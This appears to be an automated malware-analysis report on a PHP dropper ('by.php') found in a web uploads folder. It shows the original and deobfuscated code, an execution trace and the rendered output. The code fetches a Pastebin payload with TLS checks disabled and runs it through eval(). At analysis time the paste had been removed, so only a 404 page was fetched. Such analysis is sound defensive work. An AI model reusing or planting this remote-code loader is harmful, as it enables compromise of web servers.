PHP Malware Analysis

by.php

md5: 86e3dbc1fae9e20cf76aa8015b1404b7


Title
  • Pastebin.com - Not Found (#404) (HTML)


Deobfuscated PHP code

<?php

// Downloader stage: fetch a remote payload over cURL and hand it straight to eval().
function get_contents($url)
{
    $ch = curl_init("{$url}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   // return the body instead of printing it
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);   // follow redirects
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); // spoofed browser User-Agent
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);   // TLS certificate verification disabled
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);   // hostname check disabled
    // $GLOBALS['coki'] is never defined in this file, so both cookie options receive NULL (confirmed by the trace below).
    curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']);
    $result = curl_exec($ch);
    return $result;
}
// At analysis time the paste had already been removed, so eval() only received Pastebin's 404 HTML page.
$a = get_contents('https://pastebin.com/raw/UEa2xy6G');
eval('?>' . $a);   // '?>' leaves PHP mode first, so any <?php block inside the fetched body is executed

Execution traces

data/traces/86e3dbc1fae9e20cf76aa8015b1404b7_trace-1676261601.1756.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:13:47.073430]
1	0	1	0.000161	393464
1	3	0	0.000240	398632	{main}	1		/var/www/html/uploads/by.php	0	0
2	4	0	0.000258	398632	get_contents	1		/var/www/html/uploads/by.php	15	1	'https://pastebin.com/raw/UEa2xy6G'
3	5	0	0.000275	398632	curl_init	0		/var/www/html/uploads/by.php	3	1	'https://pastebin.com/raw/UEa2xy6G'
3	5	1	0.000297	399576
3	5	R			resource(3) of type (curl)
2		A						/var/www/html/uploads/by.php	3	$ch = resource(3) of type (curl)
3	6	0	0.000327	399544	curl_setopt	0		/var/www/html/uploads/by.php	4	3	resource(3) of type (curl)	19913	1
3	6	1	0.000342	399640
3	6	R			TRUE
3	7	0	0.000356	399544	curl_setopt	0		/var/www/html/uploads/by.php	5	3	resource(3) of type (curl)	52	1
3	7	1	0.000371	399640
3	7	R			TRUE
3	8	0	0.000383	399544	curl_setopt	0		/var/www/html/uploads/by.php	6	3	resource(3) of type (curl)	10018	'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3	8	1	0.000401	399640
3	8	R			TRUE
3	9	0	0.000414	399544	curl_setopt	0		/var/www/html/uploads/by.php	7	3	resource(3) of type (curl)	64	0
3	9	1	0.000428	399640
3	9	R			TRUE
3	10	0	0.000440	399544	curl_setopt	0		/var/www/html/uploads/by.php	8	3	resource(3) of type (curl)	81	0
3	10	1	0.000456	399640
3	10	R			TRUE
3	11	0	0.000494	399520	curl_setopt	0		/var/www/html/uploads/by.php	9	3	resource(3) of type (curl)	10082	NULL
3	11	1	0.000515	399616
3	11	R			TRUE
3	12	0	0.000535	399520	curl_setopt	0		/var/www/html/uploads/by.php	10	3	resource(3) of type (curl)	10031	NULL
3	12	1	0.000551	399616
3	12	R			TRUE
3	13	0	0.000563	399520	curl_exec	0		/var/www/html/uploads/by.php	11	1	resource(3) of type (curl)
3	13	1	0.045958	403648
3	13	R			'<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2		A						/var/www/html/uploads/by.php	11	$result = '<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2	4	1	0.046228	402704
2	4	R			'<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
1		A						/var/www/html/uploads/by.php	15	$a = '<!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assess'
2	14	0	0.046321	404688	eval	1	'?><!DOCTYPE html>\n<html lang="en">\n<head>\n    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" />\n    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n    <title>Pastebin.com - Not Found (#404)</title>\n</head>\n<body>\n\n\n<h1>Not Found (#404)</h1>\n<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assessment, please &lt;a href=&quot;/request-to-restore/UEa2xy6G&quot; target=&quot;blank&quot;&gt;contact us&lt;/a&gt; within 14 days to avoid any permanent loss of content.</p>\n\n</body>\n</html>'	/var/www/html/uploads/by.php	16	0
2	14	1	0.046371	404688
1	3	1	0.046385	403552
			0.046464	323392
TRACE END   [2023-02-13 02:13:47.119763]


Generated HTML code

<html lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Pastebin.com - Not Found (#404)</title>
</head>
<body>


<h1>Not Found (#404)</h1>
<p>This paste has been deemed potentially harmful. Pastebin took the necessary steps to prevent access on February 14, 2022, 7:01 pm CST. If you feel this is an incorrect assessment, please &lt;a href="/request-to-restore/UEa2xy6G" target="blank"&gt;contact us&lt;/a&gt; within 14 days to avoid any permanent loss of content.</p>


</body></html>

Original PHP code

<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://pastebin.com/raw/UEa2xy6G');
eval('?>'.$a);